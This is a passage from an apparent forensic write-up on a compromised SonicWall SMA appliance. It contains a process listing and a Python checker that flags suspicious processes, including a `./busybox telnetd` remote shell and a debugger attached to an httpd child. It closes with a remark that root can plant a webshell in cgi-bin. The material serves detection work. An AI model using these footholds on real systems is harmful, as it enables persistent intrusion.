root 1811 0.1 0.0 13916 3936 ? S<s Nov27 2:51 /usr/src/EasyAccess/bin/graphd -d
root 1820 0.0 0.0 13356 1816 ? Ss Nov27 0:00 /usr/src/EasyAccess/bin/rootHelper -d
root 1832 0.0 0.0 54412 2548 ? Ssl Nov27 0:04 /usr/src/EasyAccess/bin/dhcpcd -d
root 1851 0.0 0.1 15968 5260 ? Ss Nov27 0:06 /usr/src/EasyAccess/bin/nxlog -d
root 1867 0.0 0.0 13304 3152 ? S Nov27 0:00 /usr/src/EasyAccess/bin/downloadclient -d
root 1893 0.0 0.0 13204 2512 ? S Nov27 0:00 /usr/sbin/LicenseManager
root 1894 0.0 0.0 13200 2600 ? S Nov27 0:00 /usr/sbin/PKGDownload
root 1897 0.0 0.0 13772 3708 ? Ss Nov27 0:16 /usr/src/EasyAccess/bin/HA -d
root 1922 0.0 0.1 15224 5976 ? Ss Nov27 0:00 /usr/sbin/updateAgent -d
root 1923 0.0 0.0 13172 2556 ? S Nov27 0:06 /usr/sbin/watchdog
root 1924 0.0 0.1 13708 4948 ? S Nov27 0:14 /usr/sbin/swMonitor
root 2205 0.0 0.0 0 0 ? S Nov28 0:00 [kworker/u4:2]
root 2379 0.0 0.0 2048 432 tty1 Ss+ Nov27 0:00 /sbin/mingetty tty1
root 2380 0.0 0.0 2048 432 tty2 Ss+ Nov27 0:00 /sbin/mingetty tty2
root 4284 0.0 0.0 1136 64 ? Ss Nov27 0:00 ./busybox telnetd
root 4301 0.0 0.0 3564 1768 pts/0 Ss+ Nov27 0:00 -cli
root 4346 0.0 0.0 3488 1752 pts/1 Ss Nov27 0:00 -cli
nobody 18542 0.0 0.2 25772 12268 ? S 07:41 0:00 /usr/src/EasyAccess/bin/httpd
nobody 21363 0.0 0.7 44288 29776 ? S 08:19 0:01 /usr/src/EasyAccess/bin/httpd
nobody 24039 0.0 0.7 44344 30100 ? S 08:55 0:00 /usr/src/EasyAccess/bin/httpd
nobody 24259 0.0 0.7 44288 29776 ? S 08:58 0:01 /usr/src/EasyAccess/bin/httpd
nobody 27511 0.0 0.7 44340 30128 ? S 09:42 0:01 /usr/src/EasyAccess/bin/httpd
nobody 30092 0.0 0.2 25772 12200 ? t 03:01 0:00 /usr/src/EasyAccess/bin/httpd
nobody 30331 1.1 0.7 44284 29316 ? S 10:20 0:00 /usr/src/EasyAccess/bin/httpd
nobody 30382 0.0 0.2 25700 11904 ? S 10:20 0:00 /usr/src/EasyAccess/bin/httpd
nobody 30391 0.0 0.2 25568 8788 ? S 10:20 0:00 /usr/src/EasyAccess/bin/httpd
nobody 30392 0.0 0.2 25568 8788 ? S 10:20 0:00 /usr/src/EasyAccess/bin/httpd
nobody 30394 0.0 0.2 25568 8788 ? S 10:20 0:00 /usr/src/EasyAccess/bin/httpd
nobody 30395 0.0 0.2 25568 8788 ? S 10:20 0:00 /usr/src/EasyAccess/bin/httpd
nobody 30396 0.0 0.2 25700 11908 ? S 10:20 0:00 /usr/src/EasyAccess/bin/httpd
nobody 30397 0.0 0.2 25568 8788 ? S 10:20 0:00 /usr/src/EasyAccess/bin/httpd
root 30465 2.0 0.1 13776 4612 ? S 10:21 0:00 /usr/src/EasyAccess/www/spog/exportDiagnostics
root 30599 0.0 0.0 3480 1420 ? S 10:21 0:00 sh -c ps awux>>/tmp/status.txt 2>&1
root 30600 0.0 0.0 2556 880 ? R 10:21 0:00 ps awux
```
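Reviewing the process table by eye is the hard part the text mentions, so the following added example (not SonicWall's or Rapid7's code) mechanizes it: it parses the `ps awux` section of status.txt and flags an entry when its executable is not in a baseline, when it was launched from a relative or temporary path, when its STAT column carries `t` (stopped under a tracer, which is how a child with a debugger attached shows up), or when something other than httpd is running as the web server user. The baseline set and the sample status excerpt are constructed from the listing above for this example; on a real appliance the baseline should be built from a known-clean device on the same firmware.

```python
"""Review the `ps awux` section of an SMA status.txt against a process baseline (added example)."""

# Constructed baseline of executables taken from the listing above. This is an
# example allowlist for this page, not a vendor-published one.
BASELINE_EXECUTABLES = {
    "init", "-cli", "sh", "ps", "cat", "htcacheclean",
    "/usr/sbin/vmtoolsd", "/usr/sbin/fcron", "/usr/sbin/syslogd", "/usr/sbin/klogd",
    "/usr/bin/python3.6", "/usr/bin/node", "/sbin/mingetty",
    "/usr/src/EasyAccess/bin/httpd", "/usr/src/EasyAccess/bin/smm",
    "/usr/src/EasyAccess/www/spog/exportDiagnostics",
}

# Constructed status.txt excerpt: a subset of the rows shown above, including the
# three that a reviewer should notice (./gdb, ./busybox, and the traced httpd child).
SAMPLE_STATUS_TXT = """\
Processes
-----------------------------------------------------------------
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2068 584 ? Ss Nov27 0:42 init [3]
root 2 0.0 0.0 0 0 ? S Nov27 0:00 [kthreadd]
root 1407 0.0 0.0 13752 2744 ? Sl Nov27 1:45 /usr/sbin/vmtoolsd
root 1447 0.0 0.4 19712 16996 pts/1 S+ 03:51 0:00 ./gdb -p 30092
root 1483 0.0 1.4 93152 59728 ? Sl Nov27 0:55 /usr/bin/python3.6 /usr/src/EasyAccess/www/python/authentication_api/restful_api.py
nobody 1526 0.0 0.0 0 0 ? Z 03:52 0:00 [staticContent] <defunct>
root 1779 0.8 0.2 23468 8940 ? Ss Nov27 21:47 /usr/src/EasyAccess/bin/httpd
root 4284 0.0 0.0 1136 64 ? Ss Nov27 0:00 ./busybox telnetd
root 4346 0.0 0.0 3488 1752 pts/1 Ss Nov27 0:00 -cli
nobody 18542 0.0 0.2 25772 12268 ? S 07:41 0:00 /usr/src/EasyAccess/bin/httpd
nobody 30092 0.0 0.2 25772 12200 ? t 03:01 0:00 /usr/src/EasyAccess/bin/httpd
root 30465 2.0 0.1 13776 4612 ? S 10:21 0:00 /usr/src/EasyAccess/www/spog/exportDiagnostics
root 30599 0.0 0.0 3480 1420 ? S 10:21 0:00 sh -c ps awux>>/tmp/status.txt 2>&1
root 30600 0.0 0.0 2556 880 ? R 10:21 0:00 ps awux
"""


def parse_ps_line(line):
    """Split one `ps awux` row into its 11 columns; return None for headers and separators."""
    fields = line.split(None, 10)
    if len(fields) != 11 or not fields[1].isdigit():
        return None
    user, pid, _cpu, _mem, _vsz, _rss, tty, stat, _start, _time, command = fields
    return {"user": user, "pid": int(pid), "tty": tty, "stat": stat, "command": command}


def review_processes(status_text, baseline=BASELINE_EXECUTABLES):
    """Return a finding dict (pid, user, command, reasons) for every suspicious row."""
    findings = []
    for raw in status_text.splitlines():
        proc = parse_ps_line(raw.strip())
        if proc is None:
            continue
        exe = proc["command"].split()[0]
        if exe.startswith("["):  # kernel threads and <defunct> entries show the name in brackets
            continue
        reasons = []
        if exe.startswith(("./", "/tmp/", "/var/tmp/", "/dev/shm/")):
            reasons.append("executable launched from a relative or temporary path")
        if exe not in baseline:
            reasons.append("executable not in baseline")
        if "t" in proc["stat"]:
            reasons.append("process stopped under a tracer (debugger attached)")
        if proc["user"] == "nobody" and exe != "/usr/src/EasyAccess/bin/httpd":
            reasons.append("unexpected process running as the web server user")
        if reasons:
            findings.append({"pid": proc["pid"], "user": proc["user"],
                             "command": proc["command"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in review_processes(SAMPLE_STATUS_TXT):
        print(f"pid {f['pid']} ({f['user']}): {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

The traced-state check is worth keeping even though gdb itself is the more obvious row: a debugger that has been renamed or copied into a system path would not trip the baseline, but the child it is attached to still shows `t` in STAT.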
Finally, it is important to note that the root user has write access to the web server's cgi-bin directory (/usr/src/EasyAccess/www/cgi-bin/), which would allow them to upload a webshell to the system. As mentioned earlier, escalating from nobody to root is simple. Therefore, reviewing http_request.log for potential webshell accesses may be beneficial. However, modifications to cgi-bin do not persist across reboots (although whether a rebooted system can be trusted after exploitation is another matter).